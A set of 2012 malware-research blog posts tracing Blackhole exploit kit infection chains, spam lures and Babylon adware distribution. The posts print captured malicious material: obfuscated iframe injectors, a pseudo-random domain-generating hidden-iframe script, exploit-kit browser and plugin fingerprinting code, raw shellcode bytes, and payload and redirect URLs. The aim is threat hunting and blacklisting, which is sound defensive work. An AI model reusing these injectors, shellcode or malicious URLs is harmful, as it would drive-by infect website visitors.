Suspicious Movement in ASN40034 (infector to tr2.4voip.biz & fwdservice.com)

It's beginning from infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good honest site. Sadly, it's having the suspicious code at 
hxxp://dansenbijjansen.com/foto/index.php?


I downloaded to examine to find the below JS/Code:
＜script>el=document.createElement("div");try{a}catch(qq)
{el.appendChild(document.createElement("p"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el)
{appendChild(document.createTextNode("eva"));}}
k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we 
Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44
c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32
c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104
c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76
c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....

↑was easily to deobfuscate to find the below iframer...
＜iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'＞＜/iframe＞

Which making me checking the hxxp://tr2.4voip.biz/in.cgi?2 to find-
the multiple malicious links as per coded below:


↑The above links is obviously for the purpose to make sure users are -
redirected to the below HTML file with another JS code:


It will lead us to the link of:
hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=

What's this? We have many reference about it in the urlquery below:


This is actually a url forwarder service used to redirect request to some-
other URL for the downloading or etc purpose. I checked to the recorded URL-
And found the format of the query like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \
7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/\
Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
 Or....
hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio=
7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt= 

In our case with the certain ticket (folio=7POYGN0G2) and - 
domain (dmn=dmn=4voip.biz) forwarded us to special path in 4voip.biz host.
Be free to check and analyzed further of what you can get from that host.

The interesting part is tr2.4voip.biz and fwdservice.com are in the -
same network :


With sharing same IP address with lame malicious domain like:
netsecur.com
wwwfaceboko.com
yourmoneybox.net
Blacklisting 4voip.biz and fwdservice.com will be a nice idea!

Read More

hphosts: Updated 01-09-2012

The hpHOSTS Hosts file has been updated. There is now a total of 169,808 listed hostsnames.If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)Latest Updated: 01/09/2012 03:45Last Verified: 01/09/2012 00:00Download hpHosts now!http://hosts-file.net/?s=Download

Read More

Understanding Recent Blackhole Exploit Kit's "js.js" Infector Trend for Smart Hunting

When I hunt honeypot blackhole exploit kit (BHEK) blacklist 
for infections I often come to see some URLs ending up with js.js on it.
The file will be the same in extention but actually it has differences in 
contents depend on malware epidemic exploitation / how the BHEK want to 
infect users at that time. 

Previously, the trend I found in the js.js code was a mere and 
common injected obfuscation script like :

 or 

↑It was obvious that we must crack this code for getting to the next -
hop of the malware source.

But the recent js.js that I found was mostly/practically a javascript calls to 
another text file contains "document.location=" of a certain blackhole sites.
The moral of this writing is, we can nail bigger stuffs / new epidemic by 
understanding the parameter produced by the recent terms.

Allow me to demonstrate this theory. Let's see the below real infected urls:
209.215.118.13  hXXp://209.215.118.136/fFDrSXRM/js.js
200.219.245.75  hXXp://aainstalacoeseletricas.com.br/3XmimsHL/js.js
184.107.196.218 hXXp://www.celucentro.com.co/qgmZiWk7/js.js
82.98.87.89     hXXp://wilde.webprojekt.ch/v8bPW1U4/js.js
85.214.26.149   hXXp://advantage-media-sports.com/26MxXngr/js.js
194.170.160.46  hXXp://www.admirals.ae/mC9o9rRd/js.js

This will connect you to the certain "document.location=" below:
document・location='hXXp://209.59.222.20/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';
document・location='hXXp://50.116.54.37/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://173.230.130.248/pxyk80ujzb03h.php?y=078eb263358008ea';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=gawit01smae175m0';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';

The lesson teach us to understand the curent trend of parameter used in 
blackhole, which is :
/pxyk80ujzb03h.php?y=

Let's proof this theory by searching the above strings in the -
malware domain list site:


↑*) Click to enlarge the pic
↑Voila! We got ourself a new hunting field. :-) 
PS: This posts is dedicated to fellow malware hunters
#MalwareMustDie!

Read More

Pseudo Randoms Infector URL - An idea to grep it (a logical bug to be used)

A while ago we have the PseudoRandom infector spreader via Blackhole.
Lucky me to just bumped into one, I thought it was already wiped out clean.
Here's the story of it.

I got the hint of the infected url via spam by my own spam filter.
Here's the url:
hxxp://www.strow.es/proyectos/destacado.html

As usual fetch it:
--03:48:46--  hxxp://www.strow.es/proyectos/destacado.html
           => `destacado.html'
Resolving www.strow.es... 212.59.199.22
Connecting to www.strow.es|212.59.199.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,808 (22K) [text/html]
100%[====================================>] 22,808        29.32K/s
03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]


Let's see the timestamp of it...
-rwx------   1 r00t b33r 22808 Aug  8 02:29 destacado.html
↑Ah, the old infected files who got leftover..

is a common HTML file, nothing special except it was injected by JavaScript,
the code was after the tag  like below:

You can see the code in pastebin --->>>>[HERE]

This is actually a PseudoRandom JS/Code with the eval() value below,
of course is not as per it is.. you cannot run it by paste it.
function nextRandomNumber(){
  var hi = this .seed / this .Q;
  var lo = this .seed % this .Q;
  var test = this .A * lo - this .R * hi;
  if (test > 0){
    this .seed = test;
  }
  else {
    this .seed = test + this .M;
  }
  return (this .seed * this .oneOverM);
}
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = Math.ceil(d.getHours() / 3);
  this .seed = 2345678901 ＋ (d.getMonth() * 0xFFFFFF) + 
               (d.getDate() * 0xFFFF) + (Math.
  round(s * 0xFFF));
  this .A = 48271;
  this .M = 2147483647;
  this .Q = this .M / this .A;
  this .R = this .M % this .A;
  this .oneOverM = 1.0 / this .M;
  this .next = nextRandomNumber;
  return this ;
}
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str ＋ '.' + zone;
}
setInterval(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      var unix = Math.round( + new Date（）/ 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
      iframeWasCreated = true;
    }
  }
  catch (e){
    iframeWasCreated = undefined;
  }
}
, 100);
The paste of code is in here===>>>>[HERE]

Well this will lead you to the below landing page:
hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15
↑But don't get upset since nothing is in there anymore ;-)

My point is to you to see what they code in PseudoRandom.
See the code well and and you know how it works. 
The stupid thing of using PseudoRandom is there is no "really" random urls,
You have to leave something to be merged as url.
For the case of this sample is easy to grep "/in.cgi?" and see what happened in Domain List.

Read More

What can Exploit Kit do & drop? Full story of spam to malwares

I am following the steps of infection of ONE spam mail which lead to a sophisticated exploit kit which dropped MANY malwares, during infection it was automatically detecting your browser and PC to find the best mess to drop/infect you beforehand.

The dropped malwares collection is at below pic:

↑ As you can see all is in the today's date, is fresh. Don't worry the sample is out there, grab them all.
This threat is so nasty so I think I need to blog it. Below is the report. 

I believe some of you received or seeing mail like this:
Date:      Tue, 28 Aug 2012 11:04:30 -0400
From:      "Intuit Payroll Services" 
Subject:      QuickBooks Security Update

You will not be able to access your Intuit QuickBooks 
without updated Intuit Security Tool (IST™) after 31th of August, 2012.

You can update Intuit Security Tool here.

After a successful download please run the setup for an automatic 
installation, then login to Intuit Quickbooks online to check that 
it is working properly.

This email was sent from an auto-notification system that 
can't accept incoming email. Please don't reply to this message.

You have received this business communication as part of our efforts to fulfill 
your request or service your account.
You may receive this and other business communications from us 
even if you have opted out of marketing messages.

Terms, conditions, pricing, features, and service options are 
subject to change. View our complete Terms of Service.

If you click the term and condition you will access the below link:
hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html

After accessing the url you will get the malicious index.html like below:
＜html＞
＜h1＞WAIT PLEASE＜/h1＞
 ＜h3＞Loading...＜/h3＞
 ＜script type="text/javascript" 
          src="hXXp://66.242.140.34/LA5S92vH/js.js"＞＜/script＞
＜script type="text/javascript" 
          src="hXXp://freerobinfly.com/sS5N3rtK/js.js"＞＜/script＞
＜script type="text/javascript" src="
          hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"＞＜/script＞

＜/html＞
↑It is a not-good index.html, let's check in VirusTotal :
MD5: 　　　　　　5d323254ee15f460a6bd6f7262cd3c42
File size:       327 バイト ( 327 bytes )
File name:       output.2145601.txt
File type:       HTML
Tags:            html
Detection ratio: 18 / 42
Analysis date:   2012-08-31 12:47:34 UTC 
URL:             [CLICK]

If you trace the three urls written in that HTML,
it will lead you to the same javascript file. I traced it like this:
--00:27:31--  hXXp://66.242.140.34/LA5S92vH/js.js
           => `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:32 (2.72 MB/s) - `js.js' saved [78/78]

--00:27:40--  hXXp://freerobinfly.com/sS5N3rtK/js.js
           => `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]

--00:27:47--  hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
           => `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]

Let's see what's inside of this js.js
document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';
↑Another redirection. OK. This is no good too, let7s check in Virus Total again:
MD5:              e2525763bdf95e9a33001fd231ee109e
File size:        78 バイト ( 78 bytes )
File name:        js.js
File type:        Text
Detection ratio:  3 / 42
Analysis date:    2012-08-31 15:59:42 UTC ( 0 分 ago ) 
URL:              [CLICK]
↑OK, at least three antivirus product is detected it.

Let's grab it too and see the inside of it then ↓
--00:29:18--  http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
           => `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [   <=>                               ] 69,236       115.00K/s
00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]

And the inside is obfuscation code like this 

↑This is definitely not good at all, let's check it in Virus Total first↓
MD5:             643e431692f6ce0eaf4bb4bdb1e0ed4a
File size:       67.6 KB ( 69236 bytes )
File name:       pxyk80ujzb03h.php@y=078eb263358008ea
File type:       HTML
Detection ratio: 2 / 42
Analysis date:   2012-08-31 16:18:34 UTC ( 0 分 ago ) 
URL:             [CLICK]
Oh, looks like I am the first who uploaded this sample.
Well at least NOW at least we still have 2 antivirus product detected it.

If you deobfuscated it right you will have below result, 
one is the below code:
document・write('＜center＞Waiting for redirect...＜/center＞');
function end_redirect(){
  window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';

And the other is a plugin detect in Javascript:
 var PluginDetect = {
    version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
      return function (){
        c(b, a)　＜etc etc＞。。。。。

It detected your OS:
c.OS = 100;
if (b){
  var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 
  21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  , 100];
  for (f = d.length - 2; f >= 0; f = f - 2){
    if (d[f] && new RegExp(d[f], "i").test(b)){
      c.OS = d[f + 1];
      break 

It sensing your browser user agent for the right drops:
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", 
 b = a.platform || "", h = a.product || "";
 c.initObj(c, ["$", c]);
 for (fin c.Plugins){
   if (c.Plugins[f]){
     c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
   }

Sensing the element to install messes to your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : 
null      ;
c.ActiveXEnabled = false;
if (c.isIE){
  var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", 
  "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", 
  "Scripting.Dictionary", "wmplayer.ocx"];
  for (f = 0; f < j.length; f ++ ){
    if (c.getAXO(j[f])){
      c.ActiveXEnabled = true;
      break 

And Checking which browser you have
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : 
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? 

Very interesting to know that this code is considering to use Java against you:
DTK : {
 $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, 
 Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", 
 "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
 "application/java-deployment-toolkit", 
 "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : 
 function (){
   :
   :
   :
 var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + 
(a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h ++ ){
  d = f.JavaVersions[h];
  n = "JavaPlugin." + d[0] + "" + d[1];
  b = d[0] + "." + d[1] + ".";
  for (l = d[2];
  l >= 0; l -- ){
    r = "JavaWebStart.isInstalled." + b + l + ".0";
    if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO

Well, is sphisticated isn't it? The full code of deobfs are here ====>>> [CLICK]

OK, let's get further. The deobfs code above also brings you the shellcode below:

41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 57 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  1d 18 06 19 19 1e 06 1c 
1c 06 19 1f 1f 07 58 06  58 40 58 17 4e 15 18 19 
1c 18 18 0e 4d 15 19 28  28 00 

This will lead you to the downloading file from:
hxxp://50.116.44.177/p.php?f=01400&e=1

So we have two new download URL that we can assumed is payload, let's check,
The first URL is:
--00:34:48--  hxxp://davidkellett.co.uk/updateflashplayer.exe
           => `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]
100%[====================================>] 371,112       72.82K/s    ETA 00:00
00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]

In virus Total the score is 11/42:
MD5:            4c22e00d38a44b810f6103ec6837b137
File size:      362.4 KB ( 371112 bytes )
File name:      updateflashplayer.exe
File type:      Win32 EXE
Tags:          peexe
Detection ratio:11 / 42
Analysis date:  2012-08-31 15:29:23 UTC ( 7 分 ago ) 
URL:            [CLICK]
↑It looks like Zbot. I am not expert w/ naming buff, 
Anyway malware details I wrote in Virus Total Page..

The other drops goes to:
--00:36:20--  http://50.116.44.177/p.php?f=01400
           => `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]
100%[===================================> ] 177,576      147.57K/s
00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]

This is also a bad stuff, in Virus Total only 1(one) vendor detected it.
MD5:  096a79434392461517907c6f62b27cd1
File size:      173.4 KB ( 177576 bytes )
File name:      sample
File type:      Win32 EXE
Tags:          peexe
Detection ratio:1 / 42
Analysis date:  2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago ) 
URL:            [URL]
↑Is a Trojan, runs as daemon/processes, reads keyboard & screen, 
worse of all is faking Microsoft binary with the yesterday compilation day.

Read More

Payloads URI die hard - Blackhole Exploit Kit

(Contents is regularly updated for sharing the closest possible to the fact)
Some MDL already informed and publish these URLs, so I have no reason to hold anymore:

payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                classical one↑

(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
                                 ^^^^^^^^^^^^^^^^^^^^
                              ↑Good trick, don't be fooled with index.html
(Information: this is actually iframer lead to BHEK at the below link)

    hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                            ↑Not usual one, look at the parameter at php file

(3) hXXp://crane.co.th/YabymY6p/index.html
                      ^^^^^^^^^^^^^^^^^^^^
                   ↑see the above randomized subdir?

Conclusion:
You can set almost every infection scheme in blackhole interface.
yet the characteristic is still there.

Note;
This page is here because of the team work of malware researchers.
Thank you for those who contributes the contents, to those who corrected and advice,
for those who to read and share, and God & prayers bless them who take 
direct action straight to these threat.

BTW, No, I am telling you #MalwareMustDie is not selling crap.

Read More

(Updated) Beware of the BABYLON, Adware that spreads like Exploit Kit

A lot of you know about Babylon Adwares, don't you?
We ignored these guys so long. We thought they will raise no threat. Now they are spreading "with" the good evil-distribution scheme (If I cannot say it infection)
Realizing the investigated network they have, Babylon now is an AdWare yet spreads like a Exploit Pack. We should raise market awareness of this trend, who knows one day malwares came and ride under babylon scheme to become a new epidemic vector..
Please read the PoC below:

We snip a research and found the url like below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>>            => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614         --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]

Got curious so I see the inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>>  ■[ I n s t a l l e r ]
>>  P u b l i s h e r N a m e = " P r e m i u m "
>>  P r o d u c t N a m e = " S e t u p "
>>  P r o d u c t V e r s i o n = " 1 . 0 "
>>  P r o d u c t C o d e = " { 1 7 E B 6 D D C - 1 5 2 2 - 7 2 F 9 - D 5 A E
>> - 7 B
>>  1 F C 1 C 4 8 7 C E } "
>>  P u b l i s h e r I D = " 0 "
>>  S o u r c e I D = " 0 "
>>  P a g e I D = " 0 "
>>  A f f i l i a t e I D = " % I n s t a l l e r _ A f f i l i a t e I D % "
>>  I n s t a l l e r I D = " 0 "
>>  V i s i t o r I D = " 0 "
>>  L o c a l e = " e n "
>>  D a t e = " 2 0 1 2 / 0 8 / 3 1 "
>>  T i m e = " 3 : 2 3 : 0 6 "
>>  S h o w I n T a s k b a r = " 1 "
>>  H i d e S c r e e n s = " 0 "
>>  I n s t a l l e r M o d e = " "
>>
>>  [ S e r v e r ]
>>  I D = " 0 "
>>  L o c a t i o n = " D E "
>>
>>  [ U s e r I n f o ]
>>  G e o L o c a t i o n = " J P "
>>  I P A d d r e s s = " 1 2 1 . 3 . 1 7 3 . 1 9 1 "
>>  W e b B r o w s e r = " 0 "
>>
>>  [ R n d G e n ]
>>  P e r c e n t a g e = " 2 1 "
>>
>>
>>  [ S c r e e n 7 5 ]
>>  T i t l e = " S e t u p "
>>  B u t t o n 1 = " Y e s "
>>  B u t t o n 2 = " & N o "
>>  L a b e l 1 = " A r e   y o u   s u r e ? "
>>    :
>>    :
>>  etc

FYI, this server is serving babylon adware and is spreading either with its "kinda" exploit 
pack, or using Exploit Pack method. So below is conclusion:
1. The infector url is using exploit pack format.
2. Definitely logging the PC information during installation via browser and took
   snapshot of it in the server
3. Backdooring the installer w/o user's permission

Analysis:

Good researcher friends who I promised confidentiality was advising the site also comprised with a "suspected" malwares (I didn't analyze it yet) as follows:

> 46.165.199.26/v9/
> 46.165.199.26/v10/  VirusTotal Check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/
Additional/updated Note:
↑I am following the reported downloaded program described in above (VT Report).
This file is explaining to us why the PC information got uploaded to server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer using Tarma InstallMate 7 which like usual installer it drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go to details on it yet.....)
↑It is "assumed" those will start install nasty adwares in your PC and so on..
(I am sorry for not going into detail on it either)

My point is, this installer sends your PC data to motherships as per below;
DNS QUERRIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +

HTTP POSTS:
www.reportde.info POST 
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"

HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values =
/installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0
&geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1
In the HTTP/POST part it sends the installer version info's, maybe is OK, but..
In the HTTP/GET part it sends your GeoIP Location, PC local Lang, Browser information,
and of course your IP addresses. It is a PoC proven why records in the server exists.

OK, research continues to the detected IP addresses of Babylon spreader services, 
It was detected the multiple directories to be used to download links distribution:
> Fast check showed :
> /v9/
> /v17/
> /v14/
> /v16/
> /v20/
> /v21/
> /v10/
> /v26/
> /v37/
> /v33/
> /v27/
> /v34/
> /v31/
> /v43/
> /v46/
> /v47/
> /v48/
> /v45/
> /v51/
> /v42/
> /v58/
> /v56/
> /v52/
> /v54/
> /v53/
> /v57/
> /v62/
> /v68/
> /v64/
> /v66/
> /v69/
> /v70/
> /v72/
> /v67/
> /v75/
> /v71/
> /v73/
> /v78/
> /v76/
> /v74/
> /v77/
> /v79/
> /v82/
> /v80/
> /v81/
> /v87/
> /v86/
> /v88/
> /v84/
> /v83/
> /v98/
> /v94/
> /v96/
> /v95/
> /v99/
> /v97/
>
> I guess you can try 1xx, 2xx, 3xx 
Other researcher detected the mirroring scheme on 46.165.199.26 to same segment IP ADDR:
46.165.199.26/v14/      301720
46.165.199.3/v14/       301720
46.165.199.25/v14/      301720
Which some similarities of downloaded files are detected:
> http://95.211.152.157/v17/    299048
> filename="BCool.exe"
> http://95.211.150.1/v17/      299048
> filename="BCool.exe"
> http://95.211.152.156/v17/    299048
> filename="BCool.exe"

As you can see, adware is the thing that we cannot just be ignored. This adware's distributor starts to play nasty way & to victimize innocent people.
Be free to put your comment to add he current information.

Read More